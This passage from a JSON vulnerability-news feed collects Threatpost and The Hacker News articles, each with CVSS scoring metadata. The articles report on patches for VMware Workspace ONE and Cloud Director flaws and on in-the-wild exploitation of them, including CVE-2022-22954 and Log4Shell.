"impactScore": 5.9}, "published": "2022-08-03T15:23:16", "type": "threatpost", "title": "VMWare Urges Users to Patch Critical Authentication Bypass Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T15:23:16", "id": "THREATPOST:556939F8D58337486DFBC3B2A820DE47", "href": "https://threatpost.com/vmware-patch-critical-bug/180346/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-18T13:56:05", "description": "Recently reported VMware bugs are being used by hackers who are focused on using them to deliver Mirai denial-of-service malware and exploit the [Log4Shell](<https://threatpost.com/log4shell-cve-2021-44228/178225/>) vulnerability.\n\n[Security researchers at Barracuda](<https://blog.barracuda.com/2022/05/17/threat-spotlight-attempts-to-exploit-new-vmware-vulnerabilities/>) discovered that attempts were made to exploit the recent vulnerabilities [CVE-2022-22954](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22954>) and [CVE-2022-22960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22960#:~:text=VMware%20Workspace%20ONE%20Access%2C%20Identity,escalate%20privileges%20to%20'root'.>), both reported last month.\n\n\u201cBarracuda researchers analyzed the attacks and payloads detected by Barracuda systems between April to May and found a steady stream of attempts to exploit two recently uncovered VMware vulnerabilities: CVE-2022-22954 and CVE-2022-22960\u201d reported by Barracuda.\n\nVMware published an [advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>) on April 6, 2022, which detailed multiple security vulnerabilities. The most severe of these is CVE-2022-22954 with a CVSS score of 9.8, the bug allows an attacker with network access to perform remote code execution via server-side template injection on VMware Workspace ONE Access and Identity Manager Solutions.\n\nThe other bug involved CVE-2022-22960 (CVSS score 7.8), is a local privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. According to the advisory by VMware, the bug arises due to improper permission in support scripts allowing an attacker with local access to gain root privileges.\n\nThe VMware Workspace One is an intelligent-drive workspace platform that helps to manage any app on any device in a secure and simpler manner. The Identity manager handles the authentication to the platform and vRealize Automation is a DevOps-based infrastructure management platform for config of IT resources and automating the delivery of container-based applications.\n\n## **Exploitation Occurred After PoC Release**\n\nThe Barracuda researchers noted that the previous flaws are chained together for a potential full exploitation vector.\n\nAfter the bug was disclosed by VMware in April, a [proof-of-concept (PoC)](<https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433>) was released on Github and shared via Twitter.\n\n\u201cBarracuda researchers started seeing probes and exploit attempts for this vulnerability soon after the release of the advisory and the initial release of the proof of concept on GitHub,\u201d reported Barracuda.\n\nAfter the release of PoC, the spike in attempts is noticed by the researcher, they classified it as a probe rather than actual attempts to exploit.\n\n\u201cThe attacks have been consistent over time, barring a few spikes, and the vast majority of them are what would be classified as probes rather than actual exploit attempts,\u201d they added.\n\nThe researchers at Barracuda also revealed that most of the exploit attempts are primarily from botnet operators, the IPs discovered still seem to host variants of the [Mirai ](<https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/>)distributed-denial-of-service (DDoS) botnet malware, along with some Log4Shell exploits and low levels of EnemyBot (a type of DDoS botnet) attempts.\n\nThe majority of the attacks (76 percent) originated from the U.S. geographically, with most of them coming from data centers and cloud providers. The researcher added that there is a spike in IP addresses from the UK and Russia and about (6 percent) of the attacks emanate from these locations.\n\nThe researchers noted, \u201cthere are also consistent background attempts from known bad IPs in Russia.\u201d\n\n\u201cSome of these IPs perform scans for specific vulnerabilities at regular intervals, and it looks like the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes,\u201d researchers explained\n\nAccording to Barracuda \u201cthe interest levels on these vulnerabilities have stabilized\u201d after the initial spike in April, the researcher expected to analyze low-level scanning and attempts for some time.\n\nThe best way to protect the systems is to apply the patches immediately, especially if the system is internet-facing, and to place a Web application firewall (WAF) in front of such systems \u201cwill add to defense in depth against zero-day attacks and other vulnerabilities, including Log4Shell,\u201d advised by Barracuda.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-18T13:54:23", "type": "threatpost", "title": "April VMware Bugs Abused to Deliver Mirai Malware, Exploit Log4Shell", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-05-18T13:54:23", "id": "THREATPOST:590E1D474E265F02BA634F492F728536", "href": "https://threatpost.com/vmware-bugs-abused-mirai-log4shell/179652/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:28", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhvc4vGa2IyZoEewlN5F2HLawFs-FiMfHbW4QfyADIIlt1iZUhIxuVnmgW6OYvwtnA8RRwFKws709zm8x4QGA3Gjc61Xg_tf94C7Z17P13EC8cbOs76bcIf9a5b7SMFV8G7sd8QGfCevWnV_Q9Kg2-lbEV_iKtrOBXnxT2bvyaoQSZsfA8u0fYqJ3e/s728-e100/vmware.jpg>)\n\nA week after VMware released patches to remediate eight security vulnerabilities in VMware Workspace ONE Access, threat actors have begun to actively exploit one of the critical flaws in the wild.\n\nTracked as [CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>), the security shortcoming relates to a remote code execution vulnerability that stems from server-side template injection in VMware Workspace ONE Access and Identity Manager. The bug is rated 9.8 in severity.\n\n\"A malicious actor with network access can trigger a server-side [template injection](<https://attack.mitre.org/techniques/T1221/>) that may result in remote code execution,\" the company [noted](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>) in its advisory.\n\nThe virtualization services provider has since revised its bulletin to warn customers of confirmed exploitation of CVE-2022-22954 occurring in the wild. Cybersecurity firm Bad Packets also [corroborated](<https://twitter.com/bad_packets/status/1514293472697585669>) that it detected attempts to weaponize the vulnerability.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiBkLA9DuiHdpMKAdtIDMXGOSM4ENpxHRWfjsY6YoTBu_2LF_XjrUfbbJ-nYkR8AFIAG8Zazz7eJNKh9X1YP1SCtSa47PJ6yk56jDkN45SwnryIhQxD4kzIcKtkkm98pnuhnXdGOsJh5yD7DrWg8xAbbui46r8dbWBrPqVVjcCI4CyPBgStwOIpdwb-1w/s728-e100/code.jpg>) \n--- \n_Source: [Bad Packets](<https://twitter.com/bad_packets/status/1514293472697585669>)_ \n \nIt's worth noting that the patches shipped last week address seven more vulnerabilities in VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager, four of which are rated Critical, two are rated Important, and one is rated Moderate.\n\nIn light of recurring exploitation of VMWare products by nation-state groups and cyber criminal actors, it's recommended that users move quickly to upgrade to the latest version.\n\n\"This critical vulnerability should be patched or mitigated immediately,\" VMware cautioned last week. \"The ramifications of this vulnerability are serious.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T04:31:00", "type": "thn", "title": "Critical VMware Workspace ONE Access Flaw Under Active Exploitation in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-15T03:14:50", "id": "THN:64D0BEEE72A10FD1445F5CDC2BC902CD", "href": "https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:26", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj47_HIWfPxH5nbpGcyEGnt-ZPZUblMOdI_XpyXhu1zRF1eYsvMu6GSc6bhTgUCrOaV7L25EjaOR8knwftP2qbqWLuhSYH3bGjzZDAkqyGt6fVZ1W-qfB01o-OHDuHl6PxzYy5egsmKEPRd_76LyJQI61EFr5fbv02-zMWMSxQIWlRXXlm66FG1JuJG/s728-e100/vmware.jpg>)\n\nAn Iranian-linked threat actor known as [Rocket Kitten](<https://malpedia.caad.fkie.fraunhofer.de/actor/rocket_kitten>) has been observed actively exploiting a recently patched VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on vulnerable systems.\n\nTracked as [CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>) (CVSS score: 9.8), the critical issue concerns a case of remote code execution (RCE) vulnerability affecting VMware Workspace ONE Access and Identity Manager.\n\nWhile the issue was patched by the virtualization services provider on April 6, 2022, the company [cautioned users](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>) of confirmed exploitation of the flaw occurring in the wild a week later.\n\n\"A malicious actor exploiting this RCE vulnerability potentially gains an unlimited attack surface,\" researchers from Morphisec Labs [said](<https://blog.morphisec.com/vmware-identity-manager-attack-backdoor>) in a new report. \"This means highest privileged access into any components of the virtualized host and guest environment.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhtoAdHVO82LyDd1ISfF5Brv_F82zXW-gIB-NNtLXut6vg0kWkbjo2C5l1U80DnQ5nbU08CZK0RXCATcUVqR9hCI7rUoe6ooD82T1GnoZUwE_PkujXdgqaUEUxOtL5yj9rP3VYWGwRknAndD2hdvd5CGmIj5kPUzuWG-9Km85z3pkHQVZTGpIstcHs-/s728-e100/code.jpg>)\n\nAttack chains exploiting the flaw involve the distribution of a PowerShell-based stager, which is then used to download a next-stage payload called PowerTrash Loader that, in turn, injects the penetration testing tool, Core Impact, into memory for follow-on activities.\n\n\"The widespread use of VMWare identity access management combined with the unfettered remote access this attack provides is a recipe for devastating breaches across industries,\" the researchers said.\n\n\"VMWare customers should also review their VMware architecture to ensure the affected components are not accidentally published on the internet, which dramatically increases the exploitation risks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T06:18:00", "type": "thn", "title": "Iranian Hackers Exploiting VMware RCE Bug to Deploy 'Core Impact' Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-26T08:11:21", "id": "THN:36E70A976BC3FFE43255D807083BFC54", "href": "https://thehackernews.com/2022/04/iranian-hackers-exploiting-vmware-rce.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhYhLQpXs4ktmT4ASmNAm5WMPRLKn4KvCxGQyM7EUAt14UC4QzviyfBgNuoSlz7Io5LkrYc0OlVgrHUNLomiCaU4D0tsiE_2gHLUGxLoqlqr4QP2EV4WeXDF5CpRNAym0ZE5qE7zSyielAkBR_SPDfb2Y0thtvBSEkDXPGj41Yw6TbLPuIR_EMnfFoy/s728-e100/vmware.jpg>)\n\nCloud computing and virtualization technology firm VMWare on Thursday rolled out an update to resolve a critical security flaw in its Cloud Director product that could be weaponized to launch remote code execution attacks.\n\nThe issue, assigned the identifier **CVE-2022-22966**, has a CVSS score of 9.1 out of a maximum of 10. VMware credited security researcher Jari J\u00e4\u00e4skel\u00e4 with reporting the flaw.\n\n\"An authenticated, high privileged malicious actor with network access to the VMware Cloud Director tenant or provider may be able to exploit a remote code execution vulnerability to gain access to the server,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2022-0013.html>) in an advisory.\n\nVMware Cloud Director, formerly known as vCloud Director, is used by many well-known cloud providers to operate and manage their cloud infrastructures and gain visibility into datacenters across sites and geographies.\n\nThe vulnerability could, in other words, end up allowing attackers to gain access to sensitive data and take over private clouds within an entire infrastructure.\n\nAffected versions include 10.1.x, 10.2.x, and 10.3.x, with fixes available in versions 10.1.4.1, 10.2.2.3, and 10.3.3. The company has also published [workarounds](<https://kb.vmware.com/s/article/88176>) that can be followed when upgrading to a recommended version is not an option.\n\nThe patches arrive a day after [exploits](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>) for another recently fixed critical flaw in VMware Workspace ONE Access were detected in the wild.\n\nThe flaw ([CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>)) relates to a remote code execution vulnerability that stems from server-side template injection in VMware Workspace ONE Access and Identity Manager.\n\nWith VMware products often becoming a lucrative target for threat actors, the update adds to the urgency for organizations to apply necessary mitigations to prevent potential threats.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T03:42:00", "type": "thn", "title": "Critical VMware Cloud Director Bug Could Let Hackers Takeover Entire Cloud Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22966"], "modified": "2022-04-15T05:06:07", "id": "THN:7B73599687A27ACB89413C3B769DDF1A", "href": "https://thehackernews.com/2022/04/critical-vmware-cloud-director-bug.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-24T07:57:31", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjSO96Yr-42fbrwo8Mz26dzReMLZBhBr-1y2b_cB3rt2ldR4iIM7XFpqSzVBRcP_q35yY85Ysv9PamOsQtEGalqVo2kEVwH_UJHgY50OISBQnM-3HRZhjpqha3plzcVxRynX38KP35JKE3M_erCFmCzEHH5doe8_AoevSX3BHQ1zu4iRmKbkVcli0En/s728-e100/log4shell.gif>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks.\n\n\"Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and [Unified Access Gateway] servers,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/23/malicious-cyber-actors-continue-exploit-log4shell-vmware-horizon>). \"As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command-and-control (C2).\"\n\nIn one instance, the adversary is said to have been able to move laterally inside the victim network, obtain access to a disaster recovery network, and collect and exfiltrate sensitive law enforcement data.\n\n[Log4Shell](<https://thehackernews.com/2022/05/hackers-exploiting-vmware-horizon-to.html>), tracked as [CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) (CVSS score: 10.0), is a remote code execution vulnerability affecting the Apache Log4j logging library that's used by a wide range of consumers and enterprise services, websites, applications, and other products.\n\nSuccessful exploitation of the flaw could enable an attacker to send a specially-crafted command to an affected system, enabling the actors to execute malicious code and seize control of the target.\n\nBased on information gathered as part of two incident response engagements, the agencies said that the attackers weaponized the exploit to drop rogue payloads, including PowerShell scripts and a remote access tool dubbed \"hmsvc.exe\" that's equipped with capabilities to log keystrokes and deploy additional malware.\n\n\"The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network,\" the agencies noted, adding it also offers a \"graphical user interface (GUI) access over a target Windows system's desktop.\"\n\nThe PowerShell scripts, observed in the production environment of a second organization, facilitated lateral movement, enabling the APT actors to implant loader malware containing executables that include the ability to remotely monitor a system's desktop, gain reverse shell access, exfiltrate data, and upload and execute next-stage binaries.\n\nFurthermore, the adversarial collective leveraged [CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>), a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager that came to light in April 2022, to deliver the Dingo J-spy web shell.\n\nOngoing Log4Shell-related activity even after more than six months suggests that the flaw is of high interest to attackers, including state-sponsored advanced persistent threat (APT) actors, who have opportunistically targeted unpatched servers to gain an initial foothold for follow-on activity.\n\nAccording to cybersecurity company ExtraHop, Log4j vulnerabilities have been subjected to relentless scanning attempts, with financial and healthcare sectors emerging as an outsized market for potential attacks.\n\n\"Log4j is here to stay, we will see attackers leveraging it again and again,\" IBM-owned Randori [said](<https://www.randori.com/blog/log4j-top-targets-report/>) in an April 2022 report. \"Log4j buried deep into layers and layers of shared third-party code, leading us to the conclusion that we'll see instances of the Log4j vulnerability being exploited in services used by organizations that use a lot of open source.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-24T03:36:00", "type": "thn", "title": "Log4Shell Still Being Exploited to Hack VMWare Servers to Exfiltrate Sensitive Data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954"], "modified": "2022-06-24T07:37:32", "id": "THN:E27BF56DBA34B1A89BD29AEB5A6D8405", "href": "https://thehackernews.com/2022/06/log4shell-still-being-exploited-to-hack.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-22T06:05:49", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjJ3SC2qFmfiT2jBQ7uRL9vKJi04DUQpsbO7A1fNUs1i-nZPcOSHqMLLfs_NxeIWgJPJ2McE-e40OOFqvdqKfS0qk_q6XqVy_xUhkwizccN3QgiI-H1dOdGFgFFwwvYHrxwya9G6TK7xOMoBeRuvZfW3Geg0Pc1jMEivILjONU_jtyyRjiHc5KUXehz/s728-e100/grep.jpg>)\n\nA now-patched vulnerability in VMware Workspace ONE Access has been observed being exploited to deliver both cryptocurrency miners and ransomware on affected machines.\n\n\"The attacker intends to utilize a victim's resources as much as possible, not only to install RAR1Ransom for extortion, but also to spread GuardMiner to collect cryptocurrency,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability>) in a Thursday report.\n\nThe issue, tracked as [CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>) (CVSS score: 9.8), concerns a remote code execution vulnerability that stems from a case of server-side template injection. Although the shortcoming was addressed by the virtualization services provider in April 2022, it has since [come under](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>) [active](<https://thehackernews.com/2022/04/iranian-hackers-exploiting-vmware-rce.html>) [exploitation](<https://thehackernews.com/2022/05/enemybot-linux-botnet-now-exploits-web.html>) in the wild.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgCzQo1tIhYRt-mkTxp41FcBePtsfRo_0tt2H20xagyE-yzpJQWfvPovyzF8oAp3ngrJfVIoxp1VzJtUcqI6SvAVfj4g7-ADrm6lygex9p_UWMiWbLjRDVWkeWIYcKP1YVnpxBpM6MI7x9NHMr0WpP-N98EjFBZZzRqUPLyn9l0BckAKjxGBtuyAIkt/s728-e100/cyberattacks.jpg>)\n\nFortinet said it observed in August 2022 attacks that sought to weaponize the flaw to deploy the [Mirai botnet](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>) on Linux devices as well as the RAR1Ransom and [GuardMiner](<https://www.fortinet.com/fortiguard/threat-and-incident-notifications>), a variant of the XMRig Monero miner.\n\nThe Mirai sample is retrieved from a remote server and is designed to launch denial-of-service (DoS) and brute-force attacks aimed at well-known IoT devices by making use of a list of default credentials.\n\nThe distribution of RAR1Ransom and GuardMiner, on the other hand, is achieved by means of a PowerShell or a shell script depending on the operating system. RAR1ransom is also notable for leveraging the legitimate WinRAR utility to lock files in password-protected archives.\n\nFurthermore, GuardMiner comes with capabilities to propagate to other hosts by taking advantage of exploits for a number of remote code execution flaws in other software, including those in [Apache Struts](<https://nvd.nist.gov/vuln/detail/CVE-2021-31805>), [Atlassian Confluence](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>), and [Spring Cloud Gateway](<https://thehackernews.com/2022/05/new-sysrv-botnet-variant-hijacking.html>).\n\nThe findings are yet another reminder that malware campaigns continue to actively exploit recently disclosed flaws to break into unpatched systems, making it essential that users prioritize applying necessary security updates to mitigate such threats.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-21T14:56:00", "type": "thn", "title": "Multiple Campaigns Exploit VMware Vulnerability to Deploy Crypto Miners and Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31805", "CVE-2022-22954"], "modified": "2022-10-22T05:34:12", "id": "THN:06F5ECB1217B8E9B20CB0AC447D63E26", "href": "https://thehackernews.com/2022/10/multiple-campaigns-exploit-vmware.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-03T09:59:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhTOrIOL2CttCsOisd2VA2-gW84X4_vjRN0VeeVboCjatIhEmWgIzGhZkYZXyQiW0ewz7zHcj_3EwSdqRnAEPwbveJ6sP9b5SJiFO0gUhzcDnZ9z_5ucDfKC7Z8zpknqBWNLKePyknCnTPVaEsOxab4oLFhAcLQshylLe2hoOkVC6gAmgTmPpUk5AgR/s728-e100/vmware.jpg>)\n\nVirtualization services provider VMware on Tuesday shipped updates to [address 10 security flaws](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) affecting multiple products that could be abused by unauthenticated attackers to perform malicious actions.\n\nThe issues, tracked from CVE-2022-31656 through CVE-2022-31665 (CVSS scores: 4.7 - 9.8), impact VMware Workspace ONE Access, Workspace ONE Access Connector, Identity Manager, Identity Manager Connector, vRealize Automation, Cloud Foundation, and vRealize Suite Lifecycle Manager.\n\nThe most severe of the flaws is CVE-2022-31656 (CVSS score: 9.8), an authentication bypass vulnerability affecting local domain users that could be leveraged by a bad actor with network access to obtain administrative rights.\n\nAlso resolved by VMware are three remote code execution vulnerabilities (CVE-2022-31658, CVE-2022-31659, and CVE-2022-31665) related to JDBC and SQL injection that could be weaponized by an adversary with administrator and network access.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgI_LeUTMPRZAt45PycKydjnK35qzJ1vbQrYZzduBTK3pwXBSzoILVNO-NRrPV10q1CViYba9n3BFSkwCE3OiyPlBjFFKGfCsIsJrAb51zEv4pjpbI2p48W8c3Mtjx69-XrpwGlGorezClU2y2S8TfiA-6eMBO24eui8doqA0Tk1PmsxjAItUOG82gX/s728-e100/flaws.jpg>)\n\nElsewhere, it has also remediated a reflected cross-site scripting (XSS) vulnerability (CVE-2022-31663) that it said is a result of improper user sanitization, which could lead to the activation of malicious JavaScript code.\n\nRounding off the patches are three local privilege escalation bugs (CVE-2022-31660, CVE-2022-31661, and CVE-2022-31664) that permit an actor with local access to escalate privileges to \"root,\" a URL injection vulnerability (CVE-2022-31657), and a path traversal bug (CVE-2022-31662).\n\nWhile successful exploitation of CVE-2022-31657 makes it possible to redirect an authenticated user to an arbitrary domain, CVE-2022-31662 could equip an attacker to read files in an unauthorized manner.\n\nVMware said it's not aware of the exploitation of these vulnerabilities in the wild, but urged customers using the vulnerable products to [apply the patches immediately](<https://core.vmware.com/vmsa-2022-0021-questions-answers-faq>) to mitigate potential threats.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter 